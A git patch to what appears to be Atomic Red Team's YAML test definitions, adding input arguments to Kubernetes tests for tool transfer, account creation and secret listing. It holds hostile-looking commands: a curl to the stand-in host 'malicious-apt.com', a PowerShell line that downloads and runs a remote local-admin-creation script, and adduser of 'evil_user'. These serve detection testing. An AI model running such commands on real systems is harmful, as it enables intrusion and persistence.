From 0352cebfd78e2d2ab14128e849f64b7e9e053722 Mon Sep 17 00:00:00 2001 From: Hare Sudhan Date: Sat, 4 Oct 2025 13:50:35 -0400 Subject: [PATCH] adding input args --- atomics/T1105/T1105.yaml | 10 +++++- atomics/T1136.001/T1136.001.yaml | 57 +++++++++++++++++--------------- atomics/T1552.007/T1552.007.yaml | 2 +- 3 files changed, 40 insertions(+), 29 deletions(-) diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index d69c325f..a5cbd924 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -1280,6 +1280,14 @@ atomic_tests: description: K8s pod_name to execute the command in type: string default: atomic-insecure-curl + remote_url: + description: Remote URL to curl + type: string + default: https://malicious-apt.com + image_name: + description: Name of the docker image + type: string + default: curlimages/curl dependencies: - description: kubectl must be installed and configured get_prereq_command: | @@ -1290,4 +1298,4 @@ atomic_tests: name: bash elevation_required: false command: | - kubectl run #{pod_name} --image=curlimages/curl --restart=Never --rm -it -- curl -ksL https://malicious-apt.com \ No newline at end of file + kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url} \ No newline at end of file diff --git a/atomics/T1136.001/T1136.001.yaml b/atomics/T1136.001/T1136.001.yaml index ea5585f3..0bf06961 100644 --- a/atomics/T1136.001/T1136.001.yaml +++ b/atomics/T1136.001/T1136.001.yaml @@ -185,30 +185,33 @@ atomic_tests: command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1') name: powershell elevation_required: true -- name: Create a Linux user via kubectl in a Pod - description: | - Launches a short-lived Alpine pod and creates a Linux user inside the pod. - The pod is automatically deleted after execution. - supported_platforms: - - containers - input_arguments: - pod_name: - description: K8s pod_name to execute the command in - type: string - default: atomic-linux-useradd - username: - description: Username of the user to create inside the pod - type: string - default: evil_user - dependencies: - - description: kubectl must be installed and configured - get_prereq_command: | - echo "kubectl must be installed manually" - prereq_command: | - which kubectl - executor: - name: bash - elevation_required: false - command: | - kubectl run #{pod_name} --image=alpine --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}' - +- name: Create a Linux user via kubectl in a Pod + description: | + Launches a short-lived Alpine pod and creates a Linux user inside the pod. + The pod is automatically deleted after execution. + supported_platforms: + - containers + input_arguments: + pod_name: + description: K8s pod_name to execute the command in + type: string + default: atomic-linux-useradd + username: + description: Username of the user to create inside the pod + type: string + default: evil_user + alpine: + description: Name of the docker image + type: string + default: alpine + dependencies: + - description: kubectl must be installed and configured + get_prereq_command: | + echo "kubectl must be installed manually" + prereq_command: | + which kubectl + executor: + name: bash + elevation_required: false + command: | + kubectl run #{pod_name} --image=#{alpine} --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}' diff --git a/atomics/T1552.007/T1552.007.yaml b/atomics/T1552.007/T1552.007.yaml index 762b6638..e59b9eb7 100644 --- a/atomics/T1552.007/T1552.007.yaml +++ b/atomics/T1552.007/T1552.007.yaml @@ -1,6 +1,6 @@ attack_technique: T1552.007 display_name: Kubernetes List Secrets -atomic_tests: +atomic_tests: - name: List All Secrets auto_generated_guid: 31e794c4-48fd-4a76-aca4-6587c155bc11 description: |